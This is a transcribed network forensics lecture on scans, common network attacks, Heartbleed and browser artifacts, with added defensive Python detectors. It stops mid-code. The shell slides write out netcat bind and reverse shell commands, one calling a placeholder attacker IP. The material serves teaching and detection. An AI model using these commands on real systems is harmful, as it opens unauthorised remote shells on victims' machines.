Computer forensics

Lecture slides dated 2015-12-01 (transcription)

Network forensics

Outline
- Evidence acquisition
- Protocol analysis
- Packet analysis
- Flow analysis
- Network logs
- Network devices
- Network intrusion detection/prevention systems
- Common network attacks
- Web browser forensics

Network intrusion detection/prevention systems
- Specialized sniffers with the added capability of evaluating captured traffic to determine whether it is malicious or legitimate.
- After rebranding, most IDS systems have become IPS systems (Intrusion Prevention Systems).
- Over the years, the IDS/IPS product space has developed two separate niches:
  - NIDS/NIPS monitor network traffic and alert on suspicious network events.
  - HIDS/HIPS monitor system events and alert on suspicious system activities.

NIDS/NIPS in investigations
- Often a very good starting point in an investigation: they detect potentially adverse events via network monitoring, so chances are they have logged the incident being investigated.
- Unfortunately, they can't always reconstruct a sequence of events and explain them to us, at least not easily.
- Still useful because:
  - Logs contain details regarding illicit connections (or even attempts) that are not recorded anywhere else.
  - They can be configured to alert on and log traffic that firewalls deem perfectly acceptable.
  - An investigator could potentially modify a NIDS/NIPS configuration to begin detecting events it wasn't previously configured to record.
  - NIDS/NIPS are well positioned as inspection points for network traffic.

NIDS/NIPS functionality
- Rules: descriptions of how to compare a packet or stream with known malicious traffic.
- Alerts: lists of suspicious packets/streams.
- Packet captures: certain NIDS/NIPS can be configured to capture suspicious packets and save them for later analysis (not always configured to do this by default).
- Other features: higher-layer protocol awareness, signature-based analysis, behavioral analysis.

Types of evidence
- Configuration
- Alert data
- Packet header and/or flow record information
- Packet payloads
- Activities correlated across multiple sensors
- NIDS/NIPS are specifically designed to sift through large amounts of network traffic and pick out specific events of interest, particularly those that relate to security. Useful as a starting point!

NIDS/NIPS products
- Commercial: Check Point IPS-1, Cisco IPS, Corero Network Security, Enterasys IPS, HP TippingPoint IPS, IBM Security NIPS, Sourcefire 3D System
- Open source: Snort, Bro Network Security Monitor

Snort
- Open source NIPS and NIDS (Martin Roesch, 1998); free subscriptions for rules.
- Three modes: sniffer, traffic logger, NIDS.
- Detects probes or attacks: operating system fingerprinting attempts, common gateway interface (CGI) attacks, buffer overflows, server message block (SMB) probes, stealth port scans, ...

Common network attacks

Usual steps of an attack
1. Reconnaissance: browse various information sources for knowledge about the target system (search engines, social networks, WHOIS databases or DNS).
2. Enumeration (or scanning): systematically identifying systems and collecting information; finding vulnerabilities (openings) in the target organization, such as WiFi access points, Internet gateways, available systems, vulnerable services.
3. Exploitation: actively exploit a security weakness in order to gain access to a system, cause denial of service, etc.
4. Post exploitation: once access to a system is obtained, an attacker can use this system as a foothold for other attacks, or gather sensitive information (e.g. passwords, certificates) from the compromised system in order to compromise another one.

Scans and attacks covered
- Scans: SYN stealth scan, Idle (zombie) scan, FIN/Null/Xmas tree scans, TCP connect() scan, UDP scan, IP protocol scan, Ping scan
- Attacks: Teardrop, ARP poisoning, Password guessing, Bind shell, Reverse shell, DoS attacks (NTP, DNS), Heartbleed

Port scans
- Important because:
  - Extremely often used in the enumeration phase of an attack.
  - Usually the only way of identifying and enumerating open services on a target network device.
- There are various types of port scans; they have different impact on the target system and can be observed in different ways.
- Good attackers are known to delete logs and other useful traces of an exploit. Analyzing network logs for port scans can be helpful in identifying the attack source, because a scan usually occurs prior to an exploit (days, weeks or more earlier) and it is possible that an attacker forgets (or cannot) delete such traces.

Nmap
- Most famous tool: Nmap. Capable of conducting various types of port scans and other identification techniques often used by attackers: OS identification, service identification, checking for known vulnerabilities (limited but sometimes useful).
- Zenmap: a GUI interface for nmap; no additional features except for the GUI.
- Our focus is on identifying the various port scanning methods.

The 3-way TCP handshake
Port scans leverage the 3-way TCP handshake:
1. Client sends SYN (synchronize) to an open TCP port that has a service bound to it. Example: HTTP (port 80), SMTP (25), POP3 (110) or SSH (22).
2. Server side responds with SYN/ACK: "I ACKnowledge your SYN and I want to SYNchronize also".
3. Client answers the SYN/ACK with an ACK.
(Figure: client and server exchanging SYN, SYN/ACK, ACK.)

SYN stealth scan
- Just initiates and then closes (RST) the connection.
(Figure: attacker sends SYN to target; target replies SYN, ACK; attacker answers with RST.)

Filtered ports
- The job of a firewall is to protect a system from unwanted packets that could harm the system. E.g. an attacker is conducting a port scan against port 81; there is no service running on this port, so using a firewall to block access to it is the best practice.
- A "filtered" port result from Nmap indicates that the port has not responded at all: the SYN packet has simply been dropped by the firewall.

Closed ports
- Most commonly indicate that there is no service running on the port, BUT the firewall has allowed the connection to go through to the server.
- It can also mean there is no firewall present at all.

Open ports
- This is what attackers are looking for when using port scans.
- An open service (port) could be a publicly accessible service that is by its nature supposed to be accessible, but it could also be a back-end service that does not need to be publicly accessible and therefore should be blocked by a firewall.

Port scan types
- SYN stealth scan: the example explained in the previous slide.
- Explained in more detail in the following slides: TCP connect() scan; FIN, Null and Xmas tree scans; Ping scan; IP protocol scan; UDP scan.
- Idle scan (or zombie scan): an advanced, highly stealthy technique where no packets identifying the attacker's machine are sent to the target directly; rather, a third (innocent) computer is involved, by sending packets to the target forged to look like they came from that third computer. More information here:

TCP connect() scan
- These scans are called connect() scans because UNIX sockets programming uses a system call named connect() to begin a TCP connection to a remote site.
  - If connect() succeeds, a connection was made.
  - If it fails, the connection could not be made: the remote system is offline, the port is closed, or some other error occurred along the way...
- Very effective: provides a clear picture of the ports you can and cannot access. If a connect() scan lists a port as open, you can definitely connect to it, because that is what the scanning computer just did!
- Major drawback: the scan is very easy to detect on the system being scanned. A firewall or intrusion detection system will log all connect() attempts to every port on the system (and will almost always trigger a warning!).
- For this reason, the SYN stealth scan was developed.

FIN, Null and Xmas tree scans
- Many modern firewalls and IDS detect SYN scans, but:
  1. The FIN scan sends a packet with only the FIN flag set.
  2. The Xmas tree scan sets the FIN, URG and PUSH flags.
  3. The Null scan sends a packet with no flags switched on.
- Because: a closed port will respond with RST to all these scans, while an open port will ignore them (it is waiting for a SYN first).
- But Windows does not follow RFC 793 and ignores these packets even on closed ports, so if you also run a SYN stealth scan you can tell this is a Windows system.

UDP scan
- Sends 0-byte UDP packets to each target port.
- Receipt of an ICMP Port Unreachable message signifies the port is closed; otherwise it is assumed open.
- A major problem with this technique: when a firewall blocks outgoing ICMP Port Unreachable messages, the port will appear open. These false positives are hard to distinguish from real open ports.
- Another disadvantage of UDP scanning is the speed at which it can be performed: most operating systems limit the number of ICMP Port Unreachable messages which can be generated in a certain time period, thus slowing down a UDP scan.
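Added example (not part of the lecture slides): the scan types above are defined by the TCP flags a probe carries and by how the target answers, so an investigator reading a packet log can recover both the scan and what it revealed. The code below assumes a hypothetical per-packet record (timestamp, addresses, ports, flag letters) and a constructed log; it classifies probes as SYN/FIN/Null/Xmas, finds sources that touched many distinct ports of one host inside a time window (the "analyzing network logs for port scans" step), and rebuilds the open/closed/filtered view the scanner obtained from SYN/ACK, RST or silence.

```python
"""Port-scan triage over a packet log (added example; not part of the lecture slides)."""
from collections import defaultdict
from dataclasses import dataclass


@dataclass
class Pkt:
    """One TCP packet as a sensor might log it (hypothetical record shape)."""
    ts: float      # seconds
    src: str
    dst: str
    sport: int
    dport: int
    flags: str     # letters of the set flags: S, A, F, R, P, U ("" = Null probe)


def probe_kind(flags):
    """Classify a client-originated probe by its TCP flags, as described in the slides."""
    f = set(flags)
    if flags == "S":
        return "syn"              # SYN stealth or connect() scan start
    if not f:
        return "null"             # Null scan: no flags at all
    if f == {"F"}:
        return "fin"              # FIN scan
    if f == {"F", "P", "U"}:
        return "xmas"             # Xmas tree scan
    return None                   # SYN/ACK, ACK, RST ... are replies or handshakes, not probes


def find_scanners(packets, window=10.0, min_ports=10):
    """
    For each (source, destination) pair, slide a time window over its probes and
    count distinct destination ports; a pair that reaches min_ports distinct
    ports inside `window` seconds is reported with the probe kinds it used.
    """
    by_pair = defaultdict(list)
    for p in packets:
        kind = probe_kind(p.flags)
        if kind:
            by_pair[(p.src, p.dst)].append((p.ts, p.dport, kind))
    hits = {}
    for pair, probes in by_pair.items():
        probes.sort()
        start, best, kinds = 0, 0, set()
        for end in range(len(probes)):
            while probes[end][0] - probes[start][0] > window:
                start += 1
            span = probes[start:end + 1]
            ports = {dp for _, dp, _ in span}
            if len(ports) >= min_ports:
                best = max(best, len(ports))
                kinds.update(k for _, _, k in span)
        if best:
            hits[pair] = (best, sorted(kinds))
    return hits


def exposed_ports(packets, scanner, target):
    """
    Reconstruct what the scanner learned: for every port it sent a SYN to,
    SYN/ACK back means open, RST means closed, no answer at all means filtered.
    """
    view = {p.dport: "filtered" for p in packets
            if p.src == scanner and p.dst == target and p.flags == "S"}
    for p in packets:
        if p.src == target and p.dst == scanner and p.sport in view:
            if p.flags == "SA":
                view[p.sport] = "open"
            elif "R" in p.flags and view[p.sport] != "open":
                view[p.sport] = "closed"
    return view


def sample_log():
    """Constructed packet log (not real traffic): one SYN + Xmas scan plus a benign client."""
    scanner, target, client = "10.0.0.5", "192.168.1.10", "10.0.0.7"
    t, pk = 100.0, []
    for i, dport in enumerate(list(range(20, 35)) + [80, 81, 443]):   # 18 distinct ports
        ts = t + i * 0.05
        pk.append(Pkt(ts, scanner, target, 40000 + i, dport, "S"))
        if dport in (22, 80, 443):                                   # services listening
            pk.append(Pkt(ts + 0.001, target, scanner, dport, 40000 + i, "SA"))
            pk.append(Pkt(ts + 0.002, scanner, target, 40000 + i, dport, "R"))   # scanner tears down
        elif dport == 81:
            pass                                                     # firewall drops the SYN silently
        else:
            pk.append(Pkt(ts + 0.001, target, scanner, dport, 40000 + i, "RA"))  # closed port
    for i, dport in enumerate((22, 25)):                             # Xmas tree probes a little later
        pk.append(Pkt(t + 5 + i * 0.1, scanner, target, 41000 + i, dport, "FPU"))
    for i in range(3):                                               # benign: full handshakes to 443
        ts = t + i * 20
        pk.append(Pkt(ts, client, target, 50000 + i, 443, "S"))
        pk.append(Pkt(ts + 0.001, target, client, 443, 50000 + i, "SA"))
        pk.append(Pkt(ts + 0.002, client, target, 50000 + i, 443, "A"))
    return pk


if __name__ == "__main__":
    log = sample_log()
    for (src, dst), (n, kinds) in find_scanners(log).items():
        print(f"{src} probed {n} ports on {dst} using {kinds}")
        print(dict(sorted(exposed_ports(log, src, dst).items())))
```

The benign client touches one port three times over a minute and never trips the threshold; the scanner is reported with 18 distinct ports and both probe kinds, and the rebuilt view shows port 81 as filtered (no answer), 22/80/443 as open and the rest as closed, which is exactly the information the attacker took away and the information the investigator should compare against the firewall policy.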

IP protocol scan
- Attempts to determine which IP protocols the target supports: sends a raw IP packet without an additional protocol header, one per protocol number, to the target machine.
- Receipt of an ICMP Protocol Unreachable message tells us that the protocol is not in use; otherwise it is assumed open.
- Not all hosts send ICMP Protocol Unreachable messages. These may include firewalls, AIX, HP-UX and Digital UNIX; these machines will report all protocols open!
- This scan type also falls victim to ICMP rate limiting, the same way as UDP scans; however, since only 256 protocols are possible (8-bit protocol field in the IP header) it should not take too long.

Ping scan
- Lists the hosts within the specified range that responded to a ping. It allows an attacker to detect which computers are online, rather than which ports are open.
- Methods commonly used for ping sweeping:
  - Sending an ICMP ECHO REQUEST (ping request) packet to the destination system. If an ICMP ECHO REPLY is received, the system is up and ICMP packets are not blocked.
  - TCP ping: sends either a SYN or an ACK packet to any port (80 is the default) on the remote system. If an RST or a SYN/ACK is returned, the remote system is online. If the remote system does not respond, either it is offline or the chosen port is filtered, and thus not responding to anything.

Attacks (agenda repeated)
- Scans: SYN stealth scan, Idle (zombie) scan, FIN/Null/Xmas tree scans, TCP connect() scan, UDP scan, IP protocol scan, Ping scan
- Attacks: Teardrop, ARP poisoning, Password guessing, Bind shell, Reverse shell, DoS attacks (NTP, DNS), Heartbleed

Teardrop
- A teardrop attack is a denial of service (DoS) attack conducted by targeting the TCP/IP fragmentation reassembly code.
- This attack causes fragmented packets to overlap one another on the target host; the host attempts to reconstruct them during reassembly but fails.
- Gigantic payloads are sent to the targeted machine, causing system crashes.

Fragment offset
- One of the fields in an IP header is the fragment offset field. It indicates the starting position (offset) of the data contained in a fragmented packet relative to the data in the original packet.
- If the sum of the offset and size of one fragmented packet differs from the offset of the next fragmented packet, the packets overlap.
- When this happens, a server vulnerable to teardrop attacks is unable to reassemble the packets, resulting in a denial-of-service condition.
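Added example (not part of the lecture slides): the overlap condition above is a simple arithmetic check on the offset and length of consecutive fragments of one datagram, so a sensor or a pcap post-processor can flag teardrop-style fragment sets before they reach a reassembler. The code assumes a hypothetical fragment record (source, IP identification, byte offset, payload length, MF flag) and uses constructed fragment sets, one well-formed and one overlapping.

```python
"""Flag overlapping IP fragments (added example; not part of the lecture slides)."""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Fragment:
    """One IP fragment as extracted from a capture (hypothetical record shape)."""
    src: str
    ident: int      # IP identification field, shared by all fragments of one datagram
    offset: int     # fragment offset in bytes (the header field itself is in 8-byte units)
    length: int     # payload bytes carried by this fragment
    more: bool      # MF (more fragments) flag


def offset_field_to_bytes(field):
    """The 13-bit header field counts 8-byte blocks; convert it to a byte offset."""
    return field * 8


def check_fragments(fragments):
    """
    Group fragments by (src, ident), sort by offset and compare each fragment's
    end (offset + length) with the next fragment's offset:
      end > next offset  -> overlap (the teardrop condition)
      end < next offset  -> gap (datagram incomplete, cannot be reassembled yet)
    Returns {(src, ident): [findings]}; an empty list means the set is consistent.
    """
    groups = defaultdict(list)
    for f in fragments:
        groups[(f.src, f.ident)].append(f)
    findings = {}
    for key, frags in groups.items():
        frags.sort(key=lambda f: f.offset)
        notes = []
        if frags[0].offset != 0:
            notes.append("first fragment missing")
        for a, b in zip(frags, frags[1:]):
            end = a.offset + a.length
            if end > b.offset:
                notes.append(f"overlap: fragment {a.offset}+{a.length} runs into fragment at {b.offset}")
            elif end < b.offset:
                notes.append(f"gap between byte {end} and byte {b.offset}")
        if frags[-1].more:
            notes.append("last fragment has MF set (final fragment missing)")
        findings[key] = notes
    return findings


SAMPLE = [
    # constructed: a 3440-byte datagram split into three well-formed fragments
    Fragment("10.1.1.1", 0x1234, 0, 1480, True),
    Fragment("10.1.1.1", 0x1234, 1480, 1480, True),
    Fragment("10.1.1.1", 0x1234, 2960, 480, False),
    # constructed: second fragment claims to start inside the first one
    Fragment("10.9.9.9", 0x4242, 0, 36, True),
    Fragment("10.9.9.9", 0x4242, offset_field_to_bytes(3), 4, False),
]

if __name__ == "__main__":
    for key, notes in check_fragments(SAMPLE).items():
        print(key, notes or "consistent")
```

On a real capture the same check runs per (source, identification) pair; a mirrored sensor that sees overlap is also a hint that the target's own stack may have been tested, which is worth correlating with crash or reboot events on that host.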

ARP poisoning
- Works by sending unsolicited ARP messages that contain the IP address of a network resource, such as the default gateway or a DNS server, and replace the real MAC address of the network resource with the attacker's own MAC address.
- Network devices (by design) use the new information and overwrite any existing ARP data for that IP address.
- As a consequence, all packets sent to the legitimate system will instead be delivered to the attacker. The attacker then takes the role of the man in the middle: any traffic destined for the legitimate resource is sent through the attacking system.
- As this attack occurs on the lower levels of the OSI model, the end user is oblivious to the attack.

Online password guessing
- An often used method of gaining access to a victim system/account.
- It is a very loud way of trying to gain access: a lot of network traffic is generated, so it is easy to spot in network traces, namely a lot of authentication requests being answered with an error and sent in a small time frame (e.g. 5 seconds).
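Added example (not part of the lecture slides): because hosts overwrite an ARP entry on every reply, the two observable signs of poisoning are an IP whose MAC suddenly changes and a reply that no request asked for. The monitor below assumes a hypothetical ARP record (timestamp, opcode, sender IP/MAC, target IP) and a constructed message sequence in which the gateway's address is re-announced from a different MAC.

```python
"""ARP monitor that flags MAC changes and unsolicited replies (added example; not from the slides)."""
from dataclasses import dataclass


@dataclass
class ArpMsg:
    """One ARP message as a sensor would log it (hypothetical record shape)."""
    ts: float
    op: str          # "request" or "reply"
    sender_ip: str
    sender_mac: str
    target_ip: str


class ArpMonitor:
    """
    Remembers the first MAC seen for every IP (the behaviour of a static ARP
    table) and raises an alert when a later reply contradicts it, or when a
    reply for a protected IP (gateway, DNS server) arrives without a request.
    """

    def __init__(self, protected_ips):
        self.table = {}                 # ip -> first MAC observed
        self.pending = set()            # IPs asked about, not yet answered
        self.protected = set(protected_ips)
        self.alerts = []

    def feed(self, m):
        if m.op == "request":
            self.pending.add(m.target_ip)
            return
        known = self.table.get(m.sender_ip)
        if known is None:
            self.table[m.sender_ip] = m.sender_mac     # learn, never overwrite
        elif known != m.sender_mac:
            self.alerts.append((m.ts, "mac-change", m.sender_ip, known, m.sender_mac))
        if m.sender_ip in self.protected and m.sender_ip not in self.pending:
            self.alerts.append((m.ts, "unsolicited-reply", m.sender_ip, m.sender_mac))
        self.pending.discard(m.sender_ip)

    def run(self, messages):
        for m in sorted(messages, key=lambda x: x.ts):
            self.feed(m)
        return self.alerts


SAMPLE = [
    # constructed: a host asks for the gateway, the real gateway answers
    ArpMsg(1.0, "request", "192.168.1.50", "aa:aa:aa:aa:aa:50", "192.168.1.1"),
    ArpMsg(1.1, "reply", "192.168.1.1", "00:11:22:33:44:01", "192.168.1.50"),
    # constructed: half a minute later the gateway IP is re-announced from another MAC, unasked
    ArpMsg(30.0, "reply", "192.168.1.1", "de:ad:be:ef:00:99", "192.168.1.50"),
]

if __name__ == "__main__":
    for alert in ArpMonitor(["192.168.1.1"]).run(SAMPLE):
        print(alert)
```

Gratuitous ARP from a legitimately replaced gateway also produces a "mac-change" alert, so the second MAC should be checked against the switch's port table before it is treated as the attacker's.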

Gaining access
- How does an attacker gain access to a vulnerable system? What happens when an attacker exploits a vulnerability?
- No easy (or unique) answer, but for the most part an attacker wishes to gain remote code execution ability. This way they can run ANY command on the victim system and do anything with that computer.
- This is accomplished by exploiting some vulnerability which allows remote code execution AND instructing the victim to start a shell with which an attacker can issue more commands without having to exploit the same vulnerability again.
- Shell types: bind shell, reverse shell.

Bind shell
- Binds an application (e.g. /bin/bash) to a TCP/UDP port; any machine that connects to this port will be presented with the application that was bound, with the same privileges as the user that bound the application.
- A bind shell simply opens up a port on the victim and binds the desired application.
- Example: nc -lvvp 1234 -e cmd.exe will connect cmd.exe to port 1234; from the attacking machine: nc IP_addr-of_victim

Bind shell: limitation
- The goal is gaining access to a remote computer and the privilege to execute commands.
- With a classical bind shell, the attacker needs to connect to the shell, which means the victim needs to open this port. Not a problem: this is done with the exploit.
- However, if there is a firewall protecting the victim, it will most likely block any incoming traffic, and thus block the attacker's attempt to connect, even though the exploit was successfully triggered!

Reverse shell
- Instead of using a bind shell and forcing a victim to open a port and then trying to connect to it, an attacker can instruct the victim to start the connection and connect to the attacker, thus bypassing a firewall, since usually firewalls are configured to pass connections initiated from within the protected area.
- On the target computer the attacker forces the command: nc IP_attackers 1234 -e cmd.exe
- The attacker on his own computer executes: nc -l

Denial of service (DoS)
- DoS attacks are an attempt to make a machine or network unavailable to its intended users.
- They present one of the most significant threats to the assurance of dependable and secure information systems; very limited defense mechanisms exist.
- One of the most often used attacks: requires only a lot of bandwidth, no need for infrastructure or knowledge; can be bought easily via underground markets.
- DDoS (Distributed DoS): many (third party) computers attack the victim; very difficult to defend against or counteract.

DoS attack types
- Flood attacks, using amplification attacks (NTP, DNS)
- Protocol vulnerability exploitation attacks
- Malformed packet attacks, e.g. Teardrop, explained earlier

Amplification attacks
- A type of reflection attack. Reflection attacks involve eliciting a response from a legitimate (third party) server to a spoofed IP address (the victim's): the attacker sends a packet to a legitimate third party server with a forged source IP address (the victim's), and the server replies to the victim's address. Similar to mail-ordering goods to the address of your victim.
- NTP amplification: an attacker repeatedly sends the "get monlist" request to an NTP server while spoofing the requesting server's IP address to that of the victim server. The NTP server responds by sending the list to the spoofed IP address. This response is much larger than the request, thus amplifying the amount of traffic directed at the target server and ultimately leading to a degradation of service for legitimate requests.
- There are two criteria for a good amplification attack vector:
  - the query can be sent with a spoofed source address via a protocol like ICMP or UDP that does not require a handshake;
  - the response to the query is significantly larger than the query itself.
- DNS is a core, ubiquitous Internet service that meets these criteria and therefore has become the largest source of amplification attacks:
  - DNS queries are typically transmitted over UDP; as a result, their source address can be spoofed and the receiver has no way of determining its veracity before responding.
  - DNS is capable of generating a much larger response than the query.
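Added example (not part of the lecture slides): from the vantage point of the reflector (an open resolver or NTP server, or a sensor in front of it) an amplification attack looks like one "client" sending a stream of small queries and receiving much larger answers; the client address is in fact the spoofed victim. The code assumes a hypothetical UDP flow record (timestamp, addresses, ports, bytes) and a constructed log with one spoofed victim and one ordinary stub resolver, and reports the response-to-request byte ratio per client.

```python
"""Amplification ratio per client from a reflector-side flow log (added example; not from the slides)."""
from collections import defaultdict
from dataclasses import dataclass


@dataclass
class UdpFlow:
    """One UDP datagram summary as a flow exporter would record it (hypothetical shape)."""
    ts: float
    src: str
    sport: int
    dst: str
    dport: int
    nbytes: int


def amplification_by_client(flows, service_port=53, min_requests=20, min_factor=10.0):
    """
    Datagrams to service_port are requests from their source; datagrams from
    service_port are responses to their destination. For each client address
    sum both directions and compute factor = response bytes / request bytes.
    A client with many requests and a large factor is a likely spoofed victim
    (it never asked for any of it), so the reflector is being abused.
    """
    stats = defaultdict(lambda: {"requests": 0, "req_bytes": 0, "resp_bytes": 0})
    for f in flows:
        if f.dport == service_port:
            stats[f.src]["requests"] += 1
            stats[f.src]["req_bytes"] += f.nbytes
        elif f.sport == service_port:
            stats[f.dst]["resp_bytes"] += f.nbytes
    for s in stats.values():
        s["factor"] = round(s["resp_bytes"] / s["req_bytes"], 1) if s["req_bytes"] else None
        s["suspicious"] = s["requests"] >= min_requests and (s["factor"] or 0) >= min_factor
    return dict(stats)


def sample_flows():
    """Constructed flow log: a spoofed victim 'sending' 200 small queries, plus a normal client."""
    resolver, victim, normal = "198.51.100.53", "203.0.113.7", "192.0.2.20"
    flows = []
    for i in range(200):          # 64-byte queries with the victim's source address, 3200-byte answers
        t = 10.0 + i * 0.01
        flows.append(UdpFlow(t, victim, 40000 + i, resolver, 53, 64))
        flows.append(UdpFlow(t + 0.001, resolver, 53, victim, 40000 + i, 3200))
    for i in range(3):            # ordinary lookups: 60-byte query, 120-byte answer
        t = 12.0 + i
        flows.append(UdpFlow(t, normal, 51000 + i, resolver, 53, 60))
        flows.append(UdpFlow(t + 0.001, resolver, 53, normal, 51000 + i, 120))
    return flows


if __name__ == "__main__":
    for client, s in amplification_by_client(sample_flows()).items():
        print(client, s)
```

The same function works for NTP by passing service_port=123. The constructed victim shows a factor of 50 over 200 requests and is flagged; the stub resolver's factor of 2 is ordinary DNS. On the victim's side the corresponding signal is inbound traffic from port 53 or 123 with no matching outbound query, which this reflector-side view cannot see.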

DNS amplification example
- The following (tiny, 64-byte) query, sent with dig ANY to x.x.x.x (the IP of an open DNS resolver), will result in a response that is about … bytes long: a 64-byte query resulted in a … byte response.
- In other words, an attacker is able to achieve a 50x amplification over whatever traffic they can initiate to an open DNS resolver.
- Requests can be sent not only to one DNS server but rather to many.

Heartbleed
- A vulnerability in the popular OpenSSL cryptographic software library. It enables an attacker to steal the information protected, under normal conditions, by the SSL/TLS encryption used to secure the Internet.
- SSL/TLS provides communication security and privacy over the Internet for applications such as web, email, instant messaging (IM) and some virtual private networks (VPNs).
- The Heartbleed bug allows anyone on the Internet to read the memory of the systems protected by the vulnerable versions of the OpenSSL software.
- This, in turn, can compromise the secret keys used to identify the service providers and to encrypt the traffic, the names and passwords of the users and the actual content, which in turn allows attackers to eavesdrop on communications, steal data directly from the services and users, and impersonate services and users.

How does Heartbleed work?
- It exploits a bug in the SSL heartbeat protocol. The Heartbeat Extension provides a new protocol for TLS/DTLS allowing the usage of keep-alive functionality without performing a renegotiation: the heartbeat keeps the context between the peers alive, hence the keep-alive nomenclature.
- How it works: a heartbeat message is sent with some provisional data; the peer simply copies this data and sends it back.

The bug
- An attacker can control the heartbeat size and structure it to be larger than expected: for example, send 1 byte but claim to be sending 64k.
- Sent to the target server over TCP on port 443, the response contains up to 64 kB of data: one byte is the attacker's, but the rest up to 64k is memory content from outside the bounds of what the heartbeat should be able to access.
- Done again with a different heartbeat size, another 64 kB response from another memory region is obtained, etc.
- Over time, the attacker can reassemble the victim's memory 64 kB at a time and gain access to sensitive information: passwords, private keys etc., basically anything in memory.

HeartbeatMessage structure

    struct {
        HeartbeatMessageType type;
        uint16 payload_length;
        opaque payload[HeartbeatMessage.payload_length];
        opaque padding[padding_length];
    } HeartbeatMessage;
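Added example (not part of the lecture slides): the struct above is what an investigator's parser has to read, and the bug is a single missing comparison between the claimed payload_length and the number of bytes actually present in the record. The code below parses a TLS record carrying a heartbeat message and applies that bounds check, which is the same test a NIDS signature for this attack performs. The record builder exists only to construct a benign sample and a malformed sample for the check; layout follows RFC 6520 (content type 24, 1-byte type, 2-byte length, payload, at least 16 bytes of padding).

```python
"""Heartbeat length check for a TLS record (added example; not part of the lecture slides)."""
import struct

HEARTBEAT_CONTENT_TYPE = 24     # TLS record content type for heartbeat (RFC 6520)
HB_REQUEST, HB_RESPONSE = 1, 2  # HeartbeatMessageType values
MIN_PADDING = 16                # RFC 6520 requires at least 16 bytes of padding


def parse_tls_record(data):
    """Split one TLS record: 1-byte content type, 2-byte version, 2-byte length, body."""
    if len(data) < 5:
        raise ValueError("truncated TLS record header")
    ctype, version, length = struct.unpack("!BHH", data[:5])
    body = data[5:5 + length]
    if len(body) != length:
        raise ValueError("record body shorter than the header claims")
    return ctype, version, body


def check_heartbeat(body):
    """
    The check the vulnerable OpenSSL lacked: the claimed payload_length, plus
    the 3-byte heartbeat header and the minimum padding, must fit inside the
    record. Returns (verdict, claimed_payload_length, bytes_actually_available).
    """
    if len(body) < 3:
        return ("malformed", None, len(body))
    hb_type, payload_length = struct.unpack("!BH", body[:3])
    available = len(body) - 3 - MIN_PADDING
    if hb_type not in (HB_REQUEST, HB_RESPONSE):
        return ("unknown-type", payload_length, available)
    if payload_length > available:
        return ("heartbleed-attempt", payload_length, available)
    return ("ok", payload_length, available)


def triage_stream(data):
    """Walk a byte stream of back-to-back TLS records and check every heartbeat record."""
    verdicts, pos = [], 0
    while pos + 5 <= len(data):
        ctype, _, body = parse_tls_record(data[pos:])
        if ctype == HEARTBEAT_CONTENT_TYPE:
            verdicts.append(check_heartbeat(body))
        pos += 5 + len(body)
    return verdicts


def build_heartbeat_record(claimed_length, payload, version=0x0302):
    """Construct a heartbeat_request record for testing; claimed_length may differ from len(payload)."""
    body = struct.pack("!BH", HB_REQUEST, claimed_length) + payload + b"\x00" * MIN_PADDING
    return struct.pack("!BHH", HEARTBEAT_CONTENT_TYPE, version, len(body)) + body


if __name__ == "__main__":
    benign = build_heartbeat_record(4, b"ping")           # constructed: length matches payload
    malformed = build_heartbeat_record(0x4000, b"\x01")   # constructed: 1 byte sent, 16 kB claimed
    print(triage_stream(benign + malformed))
```

A "heartbleed-attempt" verdict on an inbound record is the trigger to pull the full session from the packet capture and check the size of the server's heartbeat responses, since an unpatched server answers with the claimed length rather than the real one.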

Heartbleed from the investigator's side
- A (lengthy) explanation and PoC code can be found at:
- A forensic investigator needs to notice the following: most exploits will send a heartbeat message which in hexadecimal representation looks like this:
- This is the hexadecimal representation of the HeartbeatMessage struct on the previous slide; it is present in most heartbeat attacks.

Web browser forensics
- Searching for evidence left by Web browsing activity is typically a crucial component of digital forensic investigations.
- Almost every activity a user performs while using a Web browser leaves a trace on the computer, even searching for information using a Web browser. Therefore, when an investigator analyzes a computer, this evidence can provide useful information.
- Cache, history, cookies, download list: useful because they contain evidence of Web sites visited, the time and frequency of access, and the search engine keywords used.

Browser artifact locations
- Each web browser has its own location.
- Internet Explorer:
  - Versions 4 to 9 use the Internet Explorer History File Format (or MSIE 4-9 Cache File format). The cache files, commonly named index.dat, are used to store both cache and historical information.
  - Version 10: C:\Users\%USER%\AppData\Local\Microsoft\Windows\WebCache\ ; the WebCacheV01.dat and WebCacheV24.dat files are in the Extensible Storage Engine (ESE) Database File (EDB) format.
- Firefox stores the history of visited sites in a file named places.sqlite, usually at C:\Users\%USERNAME%\AppData\Roaming\Mozilla\Firefox\Profiles\%PROFILE%.default ; it is an SQLite file, easily browsable using the tool SQLiteBrowser.

Closing remarks
- This was merely a short overview of some attacks and vulnerabilities. Each day this list grows.
- The examples in this course are meant to provide you with the tools and knowledge necessary to handle new challenges on your own.
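Added example (not part of the lecture slides): the same places.sqlite that SQLiteBrowser opens can be queried from a script, which is how the "sites visited, time and frequency of access, search keywords" items above are pulled out at scale. The code assumes only the two Firefox tables involved (moz_places and moz_historyvisits, a subset of their real columns) and that Firefox stores visit times as PRTime, microseconds since the Unix epoch; the sample database is constructed in memory so the block runs without a real profile.

```python
"""Read Firefox browsing history from places.sqlite (added example; not part of the lecture slides)."""
import sqlite3
from datetime import datetime, timezone
from urllib.parse import parse_qs, urlparse


def prtime_to_iso(prtime):
    """places.sqlite timestamps are PRTime: microseconds since the Unix epoch, UTC."""
    return datetime.fromtimestamp(prtime / 1_000_000, tz=timezone.utc).isoformat()


def open_readonly(path):
    """Open a copy of places.sqlite without writing to it (work on an image copy, never the live profile)."""
    return sqlite3.connect(f"file:{path}?mode=ro&immutable=1", uri=True)


def history(con):
    """Every recorded visit joined to its URL, title and total visit count, newest first."""
    rows = con.execute("""
        SELECT v.visit_date, p.url, p.title, p.visit_count
        FROM moz_historyvisits AS v
        JOIN moz_places AS p ON p.id = v.place_id
        ORDER BY v.visit_date DESC
    """).fetchall()
    return [{"visited": prtime_to_iso(ts), "url": url, "title": title, "visit_count": n}
            for ts, url, title, n in rows]


def search_terms(rows, param="q"):
    """Pull search-engine keywords out of visited URLs (most engines carry them in a 'q' parameter)."""
    found = []
    for r in rows:
        terms = parse_qs(urlparse(r["url"]).query).get(param)
        if terms:
            found.append((r["visited"], terms[0]))
    return found


def build_sample_db():
    """Constructed in-memory stand-in for places.sqlite using a subset of the real table columns."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE moz_places (id INTEGER PRIMARY KEY, url TEXT, title TEXT,
                                 visit_count INTEGER, last_visit_date INTEGER);
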